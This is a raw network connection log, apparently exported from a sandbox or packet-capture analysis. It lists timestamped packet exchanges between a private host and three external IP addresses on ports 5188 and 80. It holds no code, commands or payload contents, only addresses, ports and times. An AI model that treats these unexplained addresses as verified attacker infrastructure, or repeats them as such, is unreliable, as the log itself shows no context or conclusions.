Dec 5, 2024 17:32:15.397273064 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.397330999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.397392035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.398464918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.398555040 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.398705959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.399811983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.399825096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.399888039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.401148081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.401309013 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.402116060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.402301073 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.402323961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.402414083 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.403204918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.403364897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.403382063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.404056072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.404377937 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.405153990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.405297995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.405309916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.405354023 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.406361103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.406421900 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.406869888 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.407507896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.407639980 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.407711983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.408617020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.408674002 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.409054995 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.409776926 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.409817934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.409940004 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.410908937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.410967112 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.411221981 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.412061930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.412118912 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.412530899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.413163900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.413290977 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.413336039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.414360046 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.414474964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.414515972 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.415510893 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.415572882 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.415582895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.415596008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.415638924 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.416583061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.416634083 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.416634083 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.416776896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.417004108 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.417016029 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.417042017 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.417043924 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.417072058 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.417103052 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.417824030 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.417834997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.418020964 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.418925047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.419070959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.419137001 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.419214010 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.419224977 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.419236898 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.419258118 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.419279099 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.420022964 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.420473099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.420526981 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.421129942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.421200037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.421212912 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.421241045 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.421252966 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.421279907 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.421279907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.422358990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.422400951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.422553062 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.423649073 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.423777103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.423839092 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.424607038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.424959898 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.425446033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.425692081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.425803900 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.425867081 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.426969051 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.427021980 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.427056074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.428005934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.428081036 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.428181887 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.429128885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.429203987 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.429250956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.430279970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.430325031 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.430624962 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.431921005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.431956053 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.432009935 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.433331966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.433389902 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.433422089 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.433691978 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.433703899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.433736086 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.434794903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.434835911 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.434973001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.435925007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.435990095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.436161041 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.437043905 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.437199116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.437232971 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.438215017 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.438312054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.438330889 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.439306974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.439388037 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.439846992 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.440521955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.440561056 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.440903902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.441627026 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.441708088 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.441715002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.442790985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.442877054 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.442925930 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.443883896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.443927050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.444143057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.445127010 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.445188999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.445394039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.446320057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.446394920 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.446408033 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.447261095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.447305918 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.447463036 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.448477983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.448527098 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.448573112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.449645996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.449763060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.449796915 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.450753927 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.450790882 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.450843096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:15.497457981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.497601032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.497664928 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.497922897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.498051882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.498063087 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.498083115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.499087095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.499134064 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.499560118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.499612093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.499902964 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.499948025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.500679970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.500768900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.501040936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.501079082 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.501832962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.501878023 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.502089024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.502135038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.502343893 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:15.502989054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.503031015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.503494978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.503540039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.504128933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.504265070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.504306078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.505610943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.505655050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.506345034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.506412029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.506457090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.506473064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.506510973 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.507617950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.507673025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.508096933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.508143902 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.508733988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.508776903 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.509113073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.509159088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.509911060 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.509955883 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.510013103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.510051966 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.511049032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.511210918 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.511231899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.511378050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.512224913 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.512274027 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.512346029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.512409925 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.513355017 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.513448000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.513495922 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.513534069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.514513969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.514583111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.514631987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.515657902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.515706062 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.515739918 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.515774965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.516803980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.516843081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.516920090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.516953945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.517977953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.518101931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.518146992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.519124985 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.519169092 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.519378901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.519423008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.520267963 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.520308018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.520330906 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.520365953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.521420956 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.521466970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.522010088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.522052050 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.522568941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.522610903 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.522628069 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.522674084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.523778915 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.523821115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.523948908 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.523988008 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.524909019 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.524950981 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.524965048 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.525000095 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.526077032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.526118040 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.526176929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.526216030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.527229071 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.527271032 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.527335882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.527371883 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.528356075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.528397083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.528418064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.528455019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.529504061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.529546976 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.529613972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.529652119 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.530699968 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.530749083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.530766964 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.530805111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.531852961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.531896114 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.531930923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.531970024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.533054113 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.533072948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.533096075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.533118010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.534138918 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.534183025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.534204960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.534240961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.535310984 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.535357952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.535367966 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.535382032 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.535406113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.535433054 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.535440922 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.535471916 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.536427975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.536473989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.536612034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.536650896 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.537636042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.537672997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.537679911 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.537705898 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.538775921 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.538819075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.538831949 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.538867950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.539509058 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.539555073 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.539984941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.540028095 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.540067911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.540105104 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.541104078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.541150093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.541270018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.541307926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.541817904 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.541860104 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.541995049 CET	80	49800	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:15.542035103 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:15.542253971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.542295933 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.543205976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.543251038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.543400049 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.543447971 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.543564081 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.543602943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.544543028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:15.544581890 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:15.544629097 CET	80	49793	185.215.113.84	192.168.2.11
